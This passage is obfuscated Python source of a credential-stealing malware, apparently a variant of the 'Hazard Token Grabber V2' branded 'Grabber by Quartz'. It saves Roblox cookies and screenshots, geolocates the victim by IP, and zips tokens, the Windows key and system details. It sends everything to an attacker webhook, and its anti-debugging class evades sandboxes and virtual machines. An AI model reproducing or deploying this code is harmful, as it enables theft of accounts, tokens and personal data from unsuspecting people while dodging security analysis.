  326. OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKCU')#line:454
  327. if OO00000OOOOO000O0 :#line:455
  328. O0O0OOOOOOO000OO0 .robloxcookies .append (OO00000OOOOO000O0 )#line:456
  329. if O0O0OOOOOOO000OO0 .robloxcookies :#line:457
  330. with open (O0O0OOOOOOO000OO0 .dir +"\\Roblox Cookies.txt","w")as OOOO00OO0O00OO00O :#line:458
  331. for O0OOO000OOO0O0O00 in O0O0OOOOOOO000OO0 .robloxcookies :#line:459
  332. OOOO00OO0O00OO00O .write (O0OOO000OOO0O0O00 +'\n')#line:460
  333. def screenshot (OO00OOO0OOO0OOOO0 ):#line:462
  334. OO000000O0O0OO0OO =ImageGrab .grab (bbox =None ,include_layered_windows =False ,all_screens =True ,xdisplay =None )#line:468
  335. OO000000O0O0OO0OO .save (OO00OOO0OOO0OOOO0 .dir +"\\Screenshot.png")#line:469
  336. OO000000O0O0OO0OO .close ()#line:470
  337. def finish (O0OO0OOOO0OOOO000 ):#line:472
  338. for OOOOOO0OO00OOOOOO in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:473
  339. if OOOOOO0OO00OOOOOO .endswith ('.txt'):#line:474
  340. OOOO0OO000O0OOO0O =O0OO0OOOO0OOOO000 .dir +O0OO0OOOO0OOOO000 .sep +OOOOOO0OO00OOOOOO #line:475
  341. with open (OOOO0OO000O0OOO0O ,"r",errors ="ignore")as O0O00OO00O000OOOO :#line:476
  342. OO00OO0000OOO000O =O0O00OO00O000OOOO .read ()#line:477
  343. if not OO00OO0000OOO000O :#line:478
  344. O0O00OO00O000OOOO .close ()#line:479
  345. os .remove (OOOO0OO000O0OOO0O )#line:480
  346. else :#line:481
  347. with open (OOOO0OO000O0OOO0O ,"w",encoding ="utf-8",errors ="ignore")as O00O00OO0OOO00000 :#line:482
  348. O00O00OO0OOO00000 .write ("🌟・Grabber by Quartz\n\n")#line:483
  349. with open (OOOO0OO000O0OOO0O ,"a",encoding ="utf-8",errors ="ignore")as O00O0O000000OOOOO :#line:484
  350. O00O0O000000OOOOO .write (OO00OO0000OOO000O +"\n\n🌟・Grabber by Quartz")#line:485
  351. O00O0O00OO00O00OO =O0OO0OOOO0OOOO000 .getProductValues ()#line:487
  352. O0OOO0O0000OOOO00 =O00O0O00OO00O00OO [0 ].replace (" ","᠎ ")#line:488
  353. OO0O0OO0O00OO00O0 =O00O0O00OO00O00OO [1 ].replace (" ","᠎ ")#line:489
  354. O0000O0OOOO0OO000 =["https://ipinfo.io/json","https://utilities.tk/network/info"]#line:491
  355. OO000OOOOOOOO0OOO =choice (O0000O0OOOO0OO000 )#line:492
  356. O000OO000000000O0 =httpx .get (OO000OOOOOOOO0OOO ).json ()#line:493
  357. OO00OOOO0O00O00OO =O000OO000000000O0 .get ('ip')#line:495
  358. O00OOO00OO00OO00O =O000OO000000000O0 .get ('city')#line:496
  359. O0O0O0OOO000OO00O =O000OO000000000O0 .get ('country')#line:497
  360. O0OOO0O0OOOO0O0O0 =O000OO000000000O0 .get ('region')#line:498
  361. OO0OO0O0O0OO0O000 =O000OO000000000O0 .get ('org')#line:499
  362. O0O0OO00OOOOO0OOO =O000OO000000000O0 .get ('loc')#line:500
  363. O0000OO0O0OO0O00O ="https://www.google.com/maps/search/google+map++"+O0O0OO00OOOOO0OOO #line:501
  364. _O00OO0OOOO000O000 =os .path .join (O0OO0OOOO0OOOO000 .appdata ,f'Hazard.V2-[{Victim}].zip')#line:503
  365. O0OO00OO0OOO00O00 =zipfile .ZipFile (_O00OO0OOOO000O000 ,"w",zipfile .ZIP_DEFLATED )#line:504
  366. OOOO000OO000OO000 =os .path .abspath (O0OO0OOOO0OOOO000 .dir )#line:505
  367. for O0000O000OOO0O000 ,_OOO0OOO00O00OO000 ,OO0000OOO0O00O0O0 in os .walk (O0OO0OOOO0OOOO000 .dir ):#line:506
  368. for OO000OOO0O0O0O00O in OO0000OOO0O00O0O0 :#line:507
  369. O0O0O0O0OOOOOOO0O =os .path .abspath (os .path .join (O0000O000OOO0O000 ,OO000OOO0O0O0O00O ))#line:508
  370. OOOOOO00000O0O00O =O0O0O0O0OOOOOOO0O [len (OOOO000OO000OO000 )+1 :]#line:509
  371. O0OO00OO0OOO00O00 .write (O0O0O0O0OOOOOOO0O ,OOOOOO00000O0O00O )#line:510
  372. O0OO00OO0OOO00O00 .close ()#line:511
  373. OO0OOOOO0OO0O0000 =''#line:512
  374. for O00O00OO0OOO00000 in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:513
  375. OO0OOOOO0OO0O0000 +=f"・{O00O00OO0OOO00000}\n"#line:514
  376. OOO0000OOOO000O0O =''#line:515
  377. for OOO00OOOOOO000O00 in O0OO0OOOO0OOOO000 .tokens :#line:516
  378. OOO0000OOOO000O0O +=f'{OOO00OOOOOO000O00}\n\n'#line:517
  379. O0O0OOO00OO0O0000 =f"{len(OO0000OOO0O00O0O0)} Files Found: "#line:518
  380. OOOO0O0O00OO0O0O0 ={'avatar_url':'https://quartzwarrior.xyz/Quartzgif.gif','embeds':[{'author':{'name':f'*{Victim}* Just ran Token Grabber','url':'https://github.com/Rdimo/Hazard-Token-Grabber-V2','icon_url':'https://quartzwarrior.xyz/Quartzgif.gif'},'color':176185 ,'description':f'[Google Maps Location]({O0000OO0O0OO0O00O})','fields':[{'name':'\u200b','value':f'''```fix
  381. IP:᠎ {OO00OOOO0O00O00OO.replace(" ", "᠎ ") if OO00OOOO0O00O00OO else "N/A"}
  382. Org:᠎ {OO0OO0O0O0OO0O000.replace(" ", "᠎ ") if OO0OO0O0O0OO0O000 else "N/A"}
  383. City:᠎ {O00OOO00OO00OO00O.replace(" ", "᠎ ") if O00OOO00OO00OO00O else "N/A"}
  384. Region:᠎ {O0OOO0O0OOOO0O0O0.replace(" ", "᠎ ") if O0OOO0O0OOOO0O0O0 else "N/A"}
  385. Country:᠎ {O0O0O0OOO000OO00O.replace(" ", "᠎ ") if O0O0O0OOO000OO00O else "N/A"}```
  386. '''.replace (' ',''),'inline':True },{'name':'\u200b','value':f'''```fix
  387. PCName: {Victim_pc.replace(" ", "᠎ ")}
  388. WinKey:᠎ {OO0O0OO0O00OO00O0}
  389. Platform:᠎ {O0OOO0O0000OOOO00}
  390. DiskSpace:᠎ {disk}GB
  391. Ram:᠎ {ram}GB```
  392. '''.replace (' ',''),'inline':True },{'name':'**Tokens:**','value':f'''```yaml
  393. {OOO0000OOOO000O0O if OOO0000OOOO000O0O else "No tokens extracted"}```
  394. '''.replace (' ',''),'inline':False },{'name':O0O0OOO00OO0O0000 ,'value':f'''```ini
  395. [
  396. {OO0OOOOO0OO0O0000.strip()}
  397. ]```
  398. '''.replace (' ',''),'inline':False }],'footer':{'text':'🌟・Grabber by Quartz'}}]}#line:575
  399. with open (_O00OO0OOOO000O000 ,'rb')as O00O00OO0OOO00000 :#line:576
  400. if O0OO0OOOO0OOOO000 .hook_reg in O0OO0OOOO0OOOO000 .webhook :#line:577
  401. httpx .post (O0OO0OOOO0OOOO000 .webhook ,json =OOOO0O0O00OO0O0O0 )#line:578
  402. httpx .post (O0OO0OOOO0OOOO000 .webhook ,files ={'upload_file':O00O00OO0OOO00000 })#line:579
  403. else :#line:580
  404. from pyotp import TOTP #line:581
  405. OOO00OO0O00O00OO0 =TOTP (O0OO0OOOO0OOOO000 .fetch_conf ('protection')).now ()#line:582
  406. httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },json =OOOO0O0O00OO0O0O0 )#line:583
  407. httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },files ={'upload_file':O00O00OO0OOO00000 })#line:584
  408. os .remove (_O00OO0OOOO000O000 )#line:585
  409. class AntiDebug (Functions ):#line:588
  410. inVM =False #line:589
  411. def __init__ (O0O0O0000O00O00O0 ):#line:591
  412. O0O0O0000O00O00O0 .processes =list ()#line:592
  413. O0O0O0000O00O00O0 .blackListedUsers =["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]#line:597
  414. O0O0O0000O00O00O0 .blackListedPCNames =["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]#line:602
  415. O0O0O0000O00O00O0 .blackListedHWIDS =["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","79AF5279-16CF-4094-9758-F88A616D81B4","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",]#line:613
  416. for O000OO00OOOOOOO0O in [O0O0O0000O00O00O0 .listCheck ,O0O0O0000O00O00O0 .registryCheck ,O0O0O0000O00O00O0 .specsCheck ]:#line:615
  417. OO000O0O00000O0OO =threading .Thread (target =O000OO00OOOOOOO0O ,daemon =True )#line:616
  418. O0O0O0000O00O00O0 .processes .append (OO000O0O00000O0OO )#line:617
  419. OO000O0O00000O0OO .start ()#line:618
  420. for O000OOOO0O0O000OO in O0O0O0000O00O00O0 .processes :#line:619
  421. try :#line:620
  422. O000OOOO0O0O000OO .join ()#line:621
  423. except RuntimeError :#line:622
  424. continue #line:623
  425. def programExit (OOOO00OO00O0OOOO0 ):#line:625
  426. OOOO00OO00O0OOOO0 .__class__ .inVM =True #line:626
  427. def programKill (OOOO00O000O0OO0O0 ,O00O000OOOO000OO0 ):#line:628
  428. try :#line:629
  429. os .system (f"taskkill /F /T /IM {O00O000OOOO000OO0}")#line:630
  430. except (PermissionError ,InterruptedError ,ChildProcessError ,ProcessLookupError ):#line:631
  431. pass #line:632
  432. def listCheck (OOO0000OOOOO00OOO ):#line:634
  433. for OOOOO00O0000000O0 in [r'D:\Tools',r'D:\OS2',r'D:\NT3X']:#line:635
  434. if os .path .exists (OOOOO00O0000000O0 ):#line:636
  435. OOO0000OOOOO00OOO .programExit ()#line:637
  436. for OO00O000O0000O0OO in OOO0000OOOOO00OOO .blackListedUsers :#line:639
  437. if Victim ==OO00O000O0000O0OO :#line:640
  438. OOO0000OOOOO00OOO .programExit ()#line:641
  439. for O0O0O000O0O0OOOOO in OOO0000OOOOO00OOO .blackListedPCNames :#line:643
  440. if Victim_pc ==O0O0O000O0O0OOOOO :#line:644
  441. OOO0000OOOOO00OOO .programExit ()#line:645
  442. try :#line:647
  443. O0O0O00000O0O0000 =subprocess .check_output (r"wmic csproduct get uuid",creationflags =0x08000000 ).decode ().split ('\n')[1 ].strip ()#line:648
  444. except Exception :#line:649
  445. O0O0O00000O0O0000 =""#line:650
  446. for O00OOOOOOO00OO00O in OOO0000OOOOO00OOO .blackListedHWIDS :#line:651
  447. if O0O0O00000O0O0000 ==O00OOOOOOO00OO00O :#line:652
  448. OOO0000OOOOO00OOO .programExit ()#line:653
  449. def specsCheck (O000OOOOO000O00OO ):#line:655
  450. if int (ram )<=2 :#line:657
  451. O000OOOOO000O00OO .programExit ()#line:658
  452. if int (disk )<=50 :#line:659
  453. O000OOOOO000O00OO .programExit ()#line:660
  454. if int (psutil .cpu_count ())<=1 :#line:661
  455. O000OOOOO000O00OO .programExit ()#line:662
  456. def registryCheck (OO0OO00O00O0OO000 ):#line:664
  457. O0O0O0O0O000OOO00 =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")#line:665
  458. OOOOOO000O00O00OO =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")#line:666
  459. if (O0O0O0O0O000OOO00 and OOOOOO000O00O00OO )!=1 :#line:667
  460. OO0OO00O00O0OO000 .programExit ()#line:668
  461. O00OO0O0O000OO00O =winreg .OpenKey (winreg .HKEY_LOCAL_MACHINE ,'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')#line:670
  462. try :#line:671
  463. O00OOO0O0O000O0OO =winreg .QueryValueEx (O00OO0O0O000OO00O ,'0')[0 ]#line:672
  464. if ("VMware"or "VBOX")in O00OOO0O0O000O0OO :#line:673
  465. OO0OO00O00O0OO000 .programExit ()#line:674
  466. finally :#line:675
  467. winreg .CloseKey (O00OO0O0O000OO00O )#line:676
  468. if __name__ =="__main__"and os .name =="nt":#line:679
  469. try :#line:680
  470. httpx .get ('https://google.com')#line:681
  471. except httpx .ConnectTimeout :#line:682
  472. os ._exit (0 )#line:683
  473. asyncio .run (HazardTokenGrabberV2 ().init ())#line:684

comments powered by Disqus